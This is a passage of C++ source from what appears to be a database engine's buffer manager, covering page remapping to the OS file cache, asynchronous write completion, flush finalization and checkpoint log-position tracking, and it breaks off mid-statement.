// asserts pbf->err == wrnBFPageFlushPending, which is right, we shouldn't be calling if not in a flush ...
// CHECK( wrnBFPageFlushPending == ErrBFIWriteSignalState( pbf ) );
err = wrnBFPageFlushPending; // ensure no assert
pbf->err = SHORT( err );
CHECK( wrnBFPageFlushPending == ErrBFIWriteSignalState( pbf ) );
BFIWriteSignalSetComplete( pbf, JET_errSuccess );
CHECK( JET_errSuccess == ErrBFIWriteSignalState( pbf ) );
BFIWriteSignalReset( pbf );
// no longer used, but still check warnings are preserved through signal state transition function.
BFIWriteSignalSetComplete( pbf, 4007 /* was: wrnDiskGameOn */ );
CHECK( 4007 == ErrBFIWriteSignalState( pbf ) );
BFIWriteSignalReset( pbf );
BFIWriteSignalSetComplete( pbf, JET_errDiskIO );
CHECK( JET_errDiskIO == ErrBFIWriteSignalState( pbf ) );
BFIWriteSignalReset( pbf );
pbf->sxwl.ReleaseOwnership( bfltWrite );
}
#ifdef DEBUG
// Used to check entire page image on IOs that happen from the IO thread (which is 99% of them).
void * g_pvIoThreadImageCheckCache = NULL;
#endif
// remap a buffer page back (or map/reroute an allocated page) to the OS FS cache
//
// There are two interesting cases:
// 1. We were an already mapped page, and by virtue of updating / dirtying the page, we
// force a COW of the page, and so we need to tell the MM to remap it (non-COWed).
// 2. Because it was a new page we just allocated the memory, and so we want to map the
// page post write to the OS MM / FS cache to save memory.
//
// If this API succeeds (returns fTrue), then the page is [re]mapped to the OS cache
// image, and the BF::err should then be transitioned to errBFIPageRemapNotReVerified
// so that the page will be re-verified by front line latch paths. See fRemappedRet
// declaration for more details on why it is done this way.
//
#ifdef DEBUG
QWORD g_cRemapsConsidered = 0;
QWORD g_cRemapsSkippedByLatchContention = 0;
QWORD g_cRemapsSuccessful = 0;
QWORD g_cRemapsOfViewMapped = 0;
QWORD g_cRemapsOfPageAlloc = 0;
QWORD g_cRemapsFailed = 0;
QWORD g_cRemapsNonResident = 0;
#endif
BOOL FBFICacheRemapPage( __inout PBF pbf, IFileAPI* const pfapi )
{
ERR errReRead = JET_errSuccess; // we return neither of these, return just whether we remapped
ERR errCheckPage = JET_errSuccess;
VOID * pvFreshMapPage = NULL;
Assert( UlParam( JET_paramEnableViewCache ) );
Assert( pbf->sxwl.FOwnWriteLatch() );
Assert( pbf->bfat == bfatViewMapped || pbf->bfat == bfatPageAlloc );
Assert( pfapi == g_rgfmp[pbf->ifmp].Pfapi() ); // that would just be odd
// if we are not the current version this page will be evicted almost immediately, so
// do not bother remapping ...
if ( !pbf->fCurrentVersion )
{
return fFalse;
}
// check basic assumptions about the state of the page
if ( pbf->bfat == bfatViewMapped )
{
Assert( FOSMemoryFileMapped( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) );
Assert( pbf->bfdf == bfdfClean || FOSMemoryFileMappedCowed( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) );
}
else
{
Assert( pbf->bfat == bfatPageAlloc );
Assert( FOSMemoryPageAllocated( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) );
Assert( !FOSMemoryFileMapped( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) ); // paranoid
}
// save off the basic identity of the page for checking after remap
INT rgiulpOsMmPageMarkers[8]; // worst case = 32 kb DB page / 4 kb OS page
ULONG_PTR rgulpOsMmPageMarkers[8]; // worst case = 32 kb DB page / 4 kb OS page
const CPAGE::PGHDR * const ppghdrPre = (CPAGE::PGHDR*)pbf->pv;
const XECHECKSUM xechkCheckPre = ppghdrPre->checksum; // Don't need full 4 part checksum on large pages b/c change in last 1/2 page trickles up to change primary checksum
const DBTIME dbtimeCheckPre = ppghdrPre->dbtimeDirtied;
const PGNO pgnoCheckPre = ( pbf->icbPage <= icbPage8KB ) ? pbf->pgno : ( ((CPAGE::PGHDR2 *)ppghdrPre)->pgno );
Assert( pgnoCheckPre == pbf->pgno ); // for > 8 KB pages, the pgno off the pghdr2 should match the BF pgno!
Assert( g_rgcbPageSize[pbf->icbPage] % OSMemoryPageCommitGranularity() == 0 ); // ensure 100% coverage of page by the blocks
Assert( OSMemoryPageCommitGranularity() % sizeof( rgulpOsMmPageMarkers[0] ) == 0 ); // ensure 100% coverage of blocks
const INT cosmmpg = g_rgcbPageSize[pbf->icbPage] / OSMemoryPageCommitGranularity();
const INT culpPerBlock = OSMemoryPageCommitGranularity() / sizeof( rgulpOsMmPageMarkers[0] );
AssertPREFIX( _countof(rgiulpOsMmPageMarkers) >= cosmmpg );
AssertPREFIX( _countof(rgulpOsMmPageMarkers) >= cosmmpg );
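// For each OS MM block backing this DB page, remember the offset and value of the first non-zero
// ULONG_PTR (or slot 0 if the whole block is zero) so that after the remap we can cheaply check
// that the new mapping presents the same bytes as the buffer we just wrote.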
for ( INT iosmmpage = 0; iosmmpage < cosmmpg; iosmmpage++ )
{
ULONG_PTR * pulpBlock = (ULONG_PTR*)( (BYTE*)pbf->pv + ( iosmmpage * OSMemoryPageCommitGranularity() ) );
INT iulp;
for ( iulp = 0; iulp < culpPerBlock; iulp++ )
{
if ( pulpBlock[iulp] != 0 )
{
rgiulpOsMmPageMarkers[iosmmpage] = iulp;
rgulpOsMmPageMarkers[iosmmpage] = pulpBlock[iulp];
break;
}
}
if( iulp == culpPerBlock )
{
// The entire block is zeros, so use the 0th offset and check for zeros ...
rgiulpOsMmPageMarkers[iosmmpage] = 0;
Expected( pulpBlock[rgiulpOsMmPageMarkers[iosmmpage]] == 0 ); // how could it have changed from the loop right above?
rgulpOsMmPageMarkers[iosmmpage] = pulpBlock[rgiulpOsMmPageMarkers[iosmmpage]];
}
AssertSz( pulpBlock[rgiulpOsMmPageMarkers[iosmmpage]] == rgulpOsMmPageMarkers[iosmmpage],
"These should be equal, we _just_ set them: %I64x == %I64x",
pulpBlock[rgiulpOsMmPageMarkers[iosmmpage]], rgulpOsMmPageMarkers[iosmmpage] );
}
#ifdef DEBUG
void * pvPageImageCheckPre = NULL;
if ( FIOThread() )
{
// We only do this on the IO thread, so I can just keep the buffer around. Note that there
// is a case through IOChangeFileSizeComplete() where this happens on a different thread, and
// so is not "implicitly locked".
if ( g_pvIoThreadImageCheckCache == NULL )
{
Expected( pbf->icbPage == g_icbCacheMax ); // should be full sized
Assert( pbf->icbPage <= icbPageBiggest ); // full size shouldn't outsize the biggest
// Alloc the maximal we could possibly use ... because we're lazy
g_pvIoThreadImageCheckCache = PvOSMemoryPageAlloc( g_rgcbPageSize[icbPageBiggest], NULL );
}
// This means 99.9% of all page images will be simply cached efficiently without memalloc/free
pvPageImageCheckPre = g_pvIoThreadImageCheckCache;
}
if ( pvPageImageCheckPre == NULL )
{
pvPageImageCheckPre = PvOSMemoryPageAlloc( g_rgcbPageSize[icbPageBiggest], NULL );
// do not want to change from retail behavior, below code silently skips checks if alloc fails ...
}
if ( pvPageImageCheckPre )
{
memcpy( pvPageImageCheckPre, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
}
#endif
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
// remap this to OS FS file cache view mapped page (thus deallocating the private COW'd memory)
// _do not remove the const_ from here. At this point we must return this value so the ESE
// state can be transitioned to errBFIPageRemapNotReVerified. Ideally we'd actually set:
// pbf->err = SHORT( ErrERRCheck( errBFIPageRemapNotReVerified ) ); // similar to errBFIPageNotVerified
// here, but we are currently at the beginning of BFIAsyncWriteComplete() and the
// error must stay in the wrnBFPageFlushPending state until we're done. So up in
// BFIAsyncWriteComplete we just use this errBFIPageRemapNotReVerified error as the
// signal error if we successfully remapped.
Assert( pbf->bfat == bfatViewMapped || pbf->bfat == bfatPageAlloc ); // just double checking
const ERR errMapOp = ( pbf->bfat == bfatPageAlloc ) ?
pfapi->ErrMMCopy( OffsetOfPgno( pbf->pgno ), g_rgcbPageSize[pbf->icbPage], &pvFreshMapPage ) :
pfapi->ErrMMRevert( OffsetOfPgno( pbf->pgno ), pbf->pv, g_rgcbPageSize[pbf->icbPage] );
// _do not remove the const_ from here (see above comment), THIS value must be returned.
const BOOL fRemappedRet = ( errMapOp >= JET_errSuccess );
FOSSetCleanupState( fCleanUpStateSaved );
if ( pbf->bfat == bfatPageAlloc )
{
if ( errMapOp >= JET_errSuccess )
{
Enforce( fRemappedRet );
Enforce( pvFreshMapPage );
Assert( pbf->pv != pvFreshMapPage ); // that would be odd ...
// Complete "re"-map for bfatPageAlloc case
OSMemoryPageFree( pbf->pv );
pbf->pv = pvFreshMapPage;
pbf->bfat = bfatViewMapped;
}
else
{
Assert( !fRemappedRet );
Assert( pvFreshMapPage == NULL ); // or we'll leak a mapping
Expected( ppghdrPre == (CPAGE::PGHDR*)pbf->pv ); // no success, no change
}
}
else
{
Expected( ppghdrPre == (CPAGE::PGHDR*)pbf->pv ); // shouldn't be able to change as true-remapping/revert doesn't require new VA address
}
if ( fRemappedRet )
{
Assert( FOSMemoryFileMapped( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) );
Assert( !FOSMemoryFileMappedCowed( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) );
// we want to protect ourselves from an exception when we deref ppghdrPost = (CPAGE::PGHDR*)pbf->pv;
// below, so I am going to force a "read" here. Note: this probably won't be an actual read IO as
// it should be freshly cached in the OS MM / FS cache since we just completed a write
// to this page.
#ifdef DEBUG
// try to prove it probably isn't a real read (per immediately previous comment)
AtomicAdd( &g_cRemapsSuccessful, 1 );
if ( pvFreshMapPage )
{
AtomicAdd( &g_cRemapsOfPageAlloc, 1 );
}
else
{
AtomicAdd( &g_cRemapsOfViewMapped, 1 );
}
if ( !FOSMemoryPageResident( pbf->pv, CbBFIBufferSize( pbf ) ) )
{
AtomicAdd( &g_cRemapsNonResident, 1 );
}
// if we have done a fair number of remaps we really shouldn't have very many non-resident pages
// here or we are in serious concern for single threading our whole IO sub-system.
// Amazingly, the OS is aggressive enough about making sure recently written pages are not
// resident when we don't open the file with actual file-cache / buffering!
// Assert( g_cRemapsSuccessful < 1000 || g_cRemapsNonResident < g_cRemapsSuccessful / 3 || !BoolParam( JET_paramEnableFileCache ) );
#endif
Expected( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
errReRead = g_rgfmp[pbf->ifmp].Pfapi()->ErrMMIORead( OffsetOfPgno( pbf->pgno ),
(BYTE*)pbf->pv,
CbBFIBufferSize( pbf ),
IFileAPI::FileMmIoReadFlag( IFileAPI::fmmiorfKeepCleanMapped | IFileAPI::fmmiorfPessimisticReRead ) );
}
else
{
// else the price of failure is nothing really, we just use more memory ... we should
// double check the memory state though ...
// Note: as a matter of normal course this can actually happen on downlevel systems that
// don't support OS remapping w/ JET_errInvalidParameter.
Assert( FOSMemoryFileMapped( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) );
Assert( pbf->bfdf == bfdfClean || FOSMemoryFileMappedCowed( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) );
OnDebug( AtomicAdd( &g_cRemapsFailed, 1 ) );
}
// check that the re-mapped page has the same basic identity it had before remapping (or at
// least that we've remapped and we'll set errBFIPageRemapNotReVerified).
// At this point we have tried to remap and so entered one of four states with a few subtleties, cases:
// 1. Remap succeeded, and the page is a perfect copy. A-ok.
// 2. Remap failed, page should be un-altered.
// 3. Remap succeeded or failed, but the page was altered, doesn't pass page-verification.
// 4. Remap succeeded or failed, but the page was altered, and still passes page-verification.
//
// The last two cases are defense in depth for our engine, and we believe they will be super rare
// cases, but they need special treatment.
// Case #3 - perhaps even just because it was paged out by OS, and re-read retrieves us a bad disk
// page .. in this case we will return true because we did remap, and this will get
// errBFIPageRemapNotReVerified set in the BF error state so clients can validate it.
// Case #4 - This is the most nefarious case, the page is altered, but still checksums, this
// will most likely mean we lost an update / appear as lost flush!!! Ugh.
//
// So this yields logic like this ... first check if the page is altered, if altered, checksum
// the page, if page is valid / still checksums (case #4) Enforce and hope recovery can fix, if it
// is not valid (case #3) trundle along and let write complete fix up the error state to
// errBFIPageRemapNotReVerified.
//
if ( errReRead < JET_errSuccess )
{
// If we failed the read, likely a 2nd effort to deref that memory (the effort to
// check the page image isn't corrupted, in the below else) will also except so we
// would crash. But since we should be remapped in this case, then we should be
// safe to just let this through and set errBFIPageRemapNotReVerified, it heals
// all sins!
Enforce( fRemappedRet );
}
else
{
const CPAGE::PGHDR * const ppghdrPost = (CPAGE::PGHDR*)pbf->pv;
const PGNO pgnoCheckPost = ( pbf->icbPage <= icbPage8KB ) ? pbf->pgno : ( ((CPAGE::PGHDR2 *)ppghdrPost)->pgno );
BOOL fMarkersSame = fTrue;
for ( INT iosmmpage2 = 0; iosmmpage2 < cosmmpg; iosmmpage2++ )
{
ULONG_PTR * pulpBlock = (ULONG_PTR*)( (BYTE*)pbf->pv + ( iosmmpage2 * OSMemoryPageCommitGranularity() ) );
fMarkersSame = fMarkersSame && ( pulpBlock[rgiulpOsMmPageMarkers[iosmmpage2]] == rgulpOsMmPageMarkers[iosmmpage2] );
Assert( fMarkersSame );
}
// if we actually have a mismatch after map, we'll checksum the page on the IO
// thread (which should avoid becoming a bottleneck, b/c this should be very rare)
if ( FBFIDatabasePage( pbf ) ||
xechkCheckPre != ppghdrPost->checksum ||
pgnoCheckPre != pgnoCheckPost ||
dbtimeCheckPre != ppghdrPost->dbtimeDirtied ||
!fMarkersSame )
{
const BFLatch bfl = { pbf->pv, (DWORD_PTR)pbf };
CPAGE cpage;
Assert( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
cpage.ReBufferPage( bfl, pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
CPageValidationLogEvent validationaction( pbf->ifmp, CPageValidationLogEvent::LOG_NONE, BUFFER_MANAGER_CATEGORY );
errCheckPage = cpage.ErrValidatePage( pgvfExtensiveChecks | pgvfDoNotCheckForLostFlush, &validationaction );
// should we check flush map here?
}
if ( errCheckPage >= JET_errSuccess || !fRemappedRet )
{
// Ok, so if the page actually validates (or we don't think we remapped) ... and we are
// mismatched, then we have a real problem (probably a lost flush) and we should tear
// down the process
// just in case we map to a different page or something cray cray (then we HAVE to die
// as this is an OS bug causing a likely consistency / lost flush problem).
Enforce( xechkCheckPre == ppghdrPost->checksum );
Enforce( dbtimeCheckPre == ppghdrPost->dbtimeDirtied );
Enforce( pgnoCheckPre == pgnoCheckPost );
Enforce( fMarkersSame );
}
// else if the page doesn't validate that's actually fine because in BFIAsyncWriteComplete
// we'll be setting the page status to errBFIPageRemapNotReVerified
}
#ifdef DEBUG
// page image copy should be consistent from what we got before (double and triple check) ...
if ( errReRead >= JET_errSuccess && // must have successfully read to do this level of validation in RFS IO tests
pvPageImageCheckPre )
{
const CPAGE::PGHDR * const ppghdrPreCopy = (CPAGE::PGHDR*)pvPageImageCheckPre;
AssertSz( xechkCheckPre == ppghdrPreCopy->checksum, "Remap checksum mismatch: 0x%I64x != 0x%I64x, errs = %d / %d",
xechkCheckPre, (XECHECKSUM)ppghdrPreCopy->checksum, errReRead, errCheckPage );
AssertSz( dbtimeCheckPre == ppghdrPreCopy->dbtimeDirtied, "Remap dbtime mismatch: %I64d != %I64d, errs = %d / %d",
dbtimeCheckPre, (DBTIME)ppghdrPreCopy->dbtimeDirtied, errReRead, errCheckPage );
AssertSz( 0 == memcmp( pvPageImageCheckPre, pbf->pv, g_rgcbPageSize[pbf->icbPage] ), "Remap page image mismatch: %I64x != %I64x, errs = %d / %d",
pvPageImageCheckPre, pbf->pv, errReRead, errCheckPage );
if ( pvPageImageCheckPre != g_pvIoThreadImageCheckCache )
{
// means we're not the IO thread (or first alloc failed and 2nd succeeded above), needs freeing
OSMemoryPageFree( pvPageImageCheckPre );
}
// Note g_pvIoThreadImageCheckCache is released in BFTerm()
}
if ( errReRead >= JET_errSuccess && // must have successfully read to do this level of validation in RFS IO tests
FBFIDatabasePage( pbf ) )
{
CPAGE cpage;
CPageValidationNullAction nullaction;
cpage.LoadPage( pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
CallS( cpage.ErrValidatePage( pgvfDoNotCheckForLostFlush, &nullaction ) );
}
#endif // DEBUG
return fRemappedRet;
}
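// Completion callback for an async page write: resets the IO context, updates the flush map (for
// database pages), optionally remaps the buffer to the OS FS cache (ViewCache), releases the range
// lock, signals the write complete (handing the "virtual latch" back to any interested thread), and
// requests any follow-up maintenance (checkpoint depth, avail pool, database flush).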
void BFIAsyncWriteComplete( const ERR err,
IFileAPI* const pfapi,
const FullTraceContext& tc,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf )
{
const IFMP ifmp = pbf->ifmp;
FMP * const pfmp = &g_rgfmp[ ifmp ];
Assert( pbf->err == wrnBFPageFlushPending );
Expected( err <= JET_errSuccess ); // no expected warnings
// reset the I/O context, since the operation is officially completed.
BFIResetIOContext( pbf );
// trace that we have just written a page
BFITraceWritePage( pbf, tc );
Assert( CmpLgpos( pbf->lgposModify, pfmp->LgposWaypoint() ) <= 0 );
Enforce( CmpLgpos( pbf->lgposModify, pfmp->LgposWaypoint() ) <= 0 ); // just for insurance
// Update the flush map with the proper flush state.
if ( FBFIDatabasePage( pbf ) )
{
if ( err >= JET_errSuccess )
{
CPAGE::PageFlushType pgft = CPAGE::pgftUnknown;
DBTIME dbtime = dbtimeNil;
const LONG cbBuffer = g_rgcbPageSize[ pbf->icbBuffer ];
CFlushMap* const pfm = g_rgfmp[ pbf->ifmp ].PFlushMap();
OnDebug( const BOOL fIsPagePatching = ( tc.etc.iorReason.Iorp() == IOREASONPRIMARY( iorpPatchFix ) ) );
OnDebug( const BOOL fIsFmRecoverable = pfm->FRecoverable() );
CPAGE cpage;
const LONG cbPage = g_rgcbPageSize[ pbf->icbPage ];
Assert( cbBuffer == cbPage );
cpage.LoadPage( pbf->ifmp, pbf->pgno, pbf->pv, cbBuffer );
dbtime = cpage.Dbtime();
if ( !FUtilZeroed( (BYTE*)pbf->pv, cbBuffer ) && ( dbtime != dbtimeShrunk ) && ( dbtime != dbtimeRevert ) )
{
pgft = cpage.Pgft();
}
cpage.UnloadPage();
Assert( !( fIsPagePatching && fIsFmRecoverable ) ); // otherwise, we'd need to sync flush the flush map
pfm->SetPgnoFlushType( pbf->pgno, pgft, dbtime );
}
}
// if we're in view cache, remap this page to minimize our private working set
BOOL fRemappedWriteLatched = fFalse;
if ( err >= JET_errSuccess &&
( pbf->bfat == bfatViewMapped || pbf->bfat == bfatPageAlloc ) )
{
// we generally eschew more work on completion because we have a single completion
// thread and we don't want to hold up IO processing; however, there are no high-scale
// large server clients using ViewCache, so we're going to let this fly for now.
OnDebug( AtomicAdd( &g_cRemapsConsidered, 1 ) );
if ( pbf->sxwl.ErrTryAcquireWriteLatch() == CSXWLatch::ERR::errSuccess )
{
// Technically could avoid if bfdf == bfdfClean from clean page overwriting, should we?
if ( FBFICacheRemapPage( pbf, pfapi ) )
{
fRemappedWriteLatched = fTrue;
}
else
{
// shoot failed, but no point in keeping this then ...
pbf->sxwl.ReleaseWriteLatch();
Assert( !fRemappedWriteLatched );
}
}
else
{
OnDebug( AtomicAdd( &g_cRemapsSkippedByLatchContention, 1 ) );
}
}
Assert( fRemappedWriteLatched || pbf->sxwl.FNotOwner() );
Assert( !fRemappedWriteLatched || pbf->sxwl.FOwnWriteLatch() );
// release our reference count on the range lock now that our write
// has completed
AssertTrack( pbf->bfbitfield.FRangeLocked(), "BFAsyncCompleteRangeNotLocked" );
pfmp->LeaveRangeLock( pbf->pgno, pbf->irangelock );
pbf->bfbitfield.SetFRangeLocked( fFalse );
// write was successful
if ( err >= JET_errSuccess )
{
OSTrace( JET_tracetagBufferManager,
OSFormat( "%s: [%s:%s] written to disk (dbtime: %s)",
__FUNCTION__,
OSFormatUnsigned( pbf->ifmp ),
OSFormatUnsigned( pbf->pgno ),
OSFormatUnsigned( (ULONG_PTR)((DBTIME*)pbf->pv)[ 1 ] ) ) );
// versioned pages will no longer be accessed once flushed so we mark them
// as supercold to get them out of the cache quickly
if ( pbf->fOlderVersion )
{
BFIMarkAsSuperCold( pbf, fFalse );
}
}
// update our page write stats
if ( pbf->fFlushed )
{
PERFOpt( cBFPagesRepeatedlyWritten.Inc( PinstFromIfmp( ifmp ), pbf->tce ) );
}
if ( grbitQOS & qosIOOptimizeCombinable )
{
PERFOpt( cBFPagesCoalescedWritten.Inc( PinstFromIfmp( ifmp ), pbf->tce ) );
}
PERFOpt( cBFPagesWritten.Inc( PinstFromIfmp( ifmp ), pbf->tce ) );
#ifdef ENABLE_CLEAN_PAGE_OVERWRITE
if ( pbf->fSuspiciouslySlowRead )
{
// we log this here as it is closest to the point we actually "repaired" the issue.
WCHAR wszPgno[ 64 ];
OSStrCbFormatW( wszPgno, sizeof(wszPgno), L"%d", pbf->pgno );
// log event
const WCHAR * rgwsz [2] = { wszPgno, g_rgfmp[ifmp].WszDatabaseName() };
UtilReportEvent(
eventWarning,
BUFFER_MANAGER_CATEGORY,
SUSPECTED_BAD_BLOCK_OVERWRITE_ID,
_countof( rgwsz ), rgwsz );
}
#endif
Assert( !fRemappedWriteLatched || err >= JET_errSuccess ); // we can't paste the right error if there was an IO error.
// declare success, the appropriate I/O error, or that we remapped (and the page needs validation)
ERR errSignal = ( err < JET_errSuccess ) ?
( err ) :
( fRemappedWriteLatched ? errBFIPageRemapNotReVerified : err );
BFIWriteSignalSetComplete( pbf, errSignal ); // lost the "virtual latch" ..
// NOTE: This effectively gives this BF to any other thread that might latch it, so no more pbf usage
// (Except when fRemappedWriteLatched == fTrue / which only happens under JET_paramEnableViewCache)
if ( fRemappedWriteLatched )
{
Assert( ErrBFIWriteSignalState( pbf ) == errBFIPageRemapNotReVerified );
// now (after write signal set complete) it is ok to release the write latch for remapped pages
pbf->sxwl.ReleaseWriteLatch();
}
// NOTE: Now definitely no pbf usage. :)
// signal appropriate threads more work ...
if ( tc.etc.iorReason.Iorp() == iorpBFCheckpointAdv &&
( ( err < JET_errSuccess ) || ( grbitQOS & qosIOCompleteWriteGameOn ) ) )
{
BFIMaintCheckpointDepthRequest( &g_rgfmp[ifmp], bfcpdmrRequestIOThreshold );
}
// request avail pool maintenance to possibly reclaim the page we just
// wrote
if ( tc.etc.iorReason.Iorp() == iorpBFAvailPool )
{
CallS( ErrBFIMaintAvailPoolRequest( bfmaprtAsync ) );
}
if ( tc.etc.iorReason.Iorp() == iorpBFDatabaseFlush )
{
g_asigBFFlush.Set();
}
}
// Finalizes a flush on a pending (err == wrnBFPageFlushPending) BF that has
// completed IO (pWriteSignalComplete != 0 / NULL, i.e. set to the signaled result).
//
// If this finalization is being performed from a path that has no data
// encumbrance (fUnencumberedPath = fTrue) then the page may be invasively
// re-organized during clean page.
//
void BFIFlushComplete( _Inout_ const PBF pbf, _In_ const BFLatchType bfltHave, _In_ const BOOL fUnencumberedPath, _In_ const BOOL fCompleteRemapReVerify, _In_ const BOOL fAllowTearDownClean )
{
const IFMP ifmp = pbf->ifmp;
FMP * const pfmp = &g_rgfmp[ ifmp ];
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
// grab the write signal error and reset the signal ...
Assert( wrnBFPageFlushPending == pbf->err );
Assert( !FBFIUpdatablePage( pbf ) );
Assert( pbf->pWriteSignalComplete <= 0xFFFF ); // should be self consistent
ERR err = ErrBFIWriteSignalState( pbf ); // grab the error ...
BFIWriteSignalReset( pbf ); // reset the error
Assert( wrnBFPageFlushPending != err );
#ifdef EXTRA_LATCHLESS_IO_CHECKS
// extra validation
// Should still checksum correctly ... note, we may not have enough stack space here,
// and so if we find we always end up without a page image, we can move this check to
// the IO thread / BFIAsyncWriteComplete where we certainly have enough space ...
// We haven't completed the flush state transition at this point yet, so skip the check
// for uninitialized pages because we could throw bogus lost flush errors.
if ( !FBFIBufferIsZeroed( pbf ) )
{
CallS( ErrBFIVerifyPageSimplyWork( pbf ) );
}
AssertRTL( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
// Now that we checksum under the page protection, we should never hit it. If we don't,
// we might consider turning off page protection to see if we hit it then.
if ( !FBFICacheViewCacheDerefIo( pbf ) &&
(DWORD)CbBFIBufferSize( pbf ) >= OSMemoryPageCommitGranularity() )
{
OSMemoryPageUnprotect( pbf->pv, CbBFIBufferSize( pbf ) );
}
#endif
Assert( CmpLgpos( pbf->lgposModify, pfmp->LgposWaypoint() ) <= 0 );
// write was successful
if ( err >= JET_errSuccess || err == errBFIPageRemapNotReVerified )
{
// validate errors
Assert( err == JET_errSuccess || err == errBFIPageRemapNotReVerified || err == wrnBFPageFlushPending );
Expected( pbf->err >= JET_errSuccess );
Expected( pbf->err == JET_errSuccess || pbf->err == wrnBFPageFlushPending );
// reset BF to "cleaned" status
const BFCleanFlags bfcf = BFCleanFlags( ( fUnencumberedPath ? bfcfAllowReorganization : bfcfNone ) | ( fAllowTearDownClean ? bfcfAllowTearDownClean : bfcfNone ) );
BFICleanPage( pbf, bfltHave, bfcf );
// now process if the page has been remapped and needs reverification
if ( err == errBFIPageRemapNotReVerified )
{
pbf->err = SHORT( errBFIPageRemapNotReVerified );
}
if ( fCompleteRemapReVerify /* only false for BFPurge / detach */ &&
pbf->err == errBFIPageRemapNotReVerified )
{
TraceContextScope tcScope( iorpBFRemapReVerify );
err = ErrBFIValidatePage( pbf, bfltHave, CPageValidationLogEvent::LOG_ALL & ~CPageValidationLogEvent::LOG_UNINIT_PAGE, *tcScope );
Assert( pbf->err != errBFIPageRemapNotReVerified );
}
}
// write was not successful
else
{
// declare the appropriate I/O error
pbf->err = SHORT( err );
Assert( pbf->err == err );
Assert( pbf->err != JET_errFileIOBeyondEOF ); // illegal to have EOF lingering in the cache
}
// indicate flushed, so later stats update correctly
pbf->fFlushed = fTrue;
}
// Time Dependencies
// critical section protecting all dependency trees
CCriticalSection g_critBFDepend( CLockBasicInfo( CSyncBasicInfo( szBFDepend ), rankBFDepend, 0 ) );
// Transaction/Logging Support
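// Records lgpos as this BF's lgposOldestBegin0 if it is earlier than the current value and registers
// the BF in the per-FMP OB0 index (falling back to the unordered overflow list if the insert fails),
// then requests checkpoint depth maintenance if the checkpoint has grown too deep.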
void BFISetLgposOldestBegin0( PBF pbf, LGPOS lgpos, const TraceContext& tc )
{
LGPOS lgposOldestBegin0Last = lgposMax;
Assert( pbf->sxwl.FOwnWriteLatch() ||
( pbf->sxwl.FOwnExclusiveLatch() && pbf->fWARLatch ) );
Assert( pbf->bfdf >= bfdfDirty );
Assert( FBFIUpdatablePage( pbf ) );
// all pages with an OB0 must be dirty. this is because we don't want untidy
// pages to stick around and hold up the checkpoint as we normally don't want
// to flush them
BFIDirtyPage( pbf, bfdfDirty, tc );
// save the current lgposOldestBegin0 for this BF
LGPOS lgposOldestBegin0 = pbf->lgposOldestBegin0;
// if the specified lgposBegin0 is earlier than the current lgposOldestBegin0
// then reset the BF's lgposOldestBegin0
if ( CmpLgpos( &lgposOldestBegin0, &lgpos ) > 0 )
{
BFIResetLgposOldestBegin0( pbf, fTrue );
}
FMP* pfmp = &g_rgfmp[ pbf->ifmp ];
// the new lgposOldestBegin0 is earlier than the current lgposOldestBegin0
if ( CmpLgpos( &lgposOldestBegin0, &lgpos ) > 0 )
{
pfmp->EnterBFContextAsReader();
OnDebug( pfmp->Pinst()->m_plog->CbLGOffsetLgposForOB0( lgpos, lgpos ) );
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
Assert( pbffmp && pbffmp->fCurrentlyAttached );
#ifdef DEBUG
// restrict check to recovery only, for performance reasons and because it is where we are more likely to violate this
// anyways.
if ( pfmp->Pinst()->m_plog->FRecovering() )
{
// Make sure the lgposOldestBegin0 we are setting in this BF is consistent with the required range stamped in the DB header.
BFIAssertReqRangeConsistentWithLgpos( pfmp, lgpos, lgposMin, "SetLgposOB0" );
}
#endif // DEBUG
// set the new lgposOldestBegin0
pbf->lgposOldestBegin0 = lgpos;
// try to insert ourself into the OB0 index
BFOB0::CLock lock;
pbffmp->bfob0.LockKeyPtr( BFIOB0Offset( pbf->ifmp, &lgpos ), pbf, &lock );
BFOB0::ERR errOB0 = pbffmp->bfob0.ErrInsertEntry( &lock, pbf );
pbffmp->bfob0.UnlockKeyPtr( &lock );
// we failed to insert ourself into the OB0 index
if ( errOB0 != BFOB0::ERR::errSuccess )
{
Assert( errOB0 == BFOB0::ERR::errOutOfMemory ||
errOB0 == BFOB0::ERR::errKeyRangeExceeded );
// insert ourself into the OB0 index overflow list. this always
// succeeds but isn't good because it is unordered
pbf->fInOB0OL = fTrue;
pbffmp->critbfob0ol.Enter();
pbffmp->bfob0ol.InsertAsNextMost( pbf );
pbffmp->critbfob0ol.Leave();
}
// get the cached value for the oldest OB0 in the cache
lgposOldestBegin0Last = pbffmp->lgposOldestBegin0Last;
pfmp->LeaveBFContextAsReader();
}
// request checkpoint depth maintenance if the checkpoint is too deep
if ( CmpLgpos( lgposOldestBegin0Last, lgposMax ) )
{
// get the most recent log record
LOG* const plog = pfmp->Pinst()->m_plog;
const LGPOS lgposNewest = plog->LgposLGLogTipNoLock();
const ULONG_PTR cbCheckpointDepthMax = pfmp->Pinst()->m_fCheckpointQuiesce ? 0 : pfmp->Pinst()->m_plog->CbLGDesiredCheckpointDepth();
const ULONG_PTR cbCheckpointDepth = (ULONG_PTR)plog->CbLGOffsetLgposForOB0( lgposNewest, lgposOldestBegin0Last );
if ( cbCheckpointDepth > cbCheckpointDepthMax )
{
BFIMaintCheckpointDepthRequest( pfmp, bfcpdmrRequestOB0Movement );
}
}
OSTrace( JET_tracetagBufferManager,
OSFormat( "%s: [%s:%s] lgposOldestBegin0 %s -> %s",
__FUNCTION__,
OSFormatUnsigned( pbf->ifmp ),
OSFormatUnsigned( pbf->pgno ),
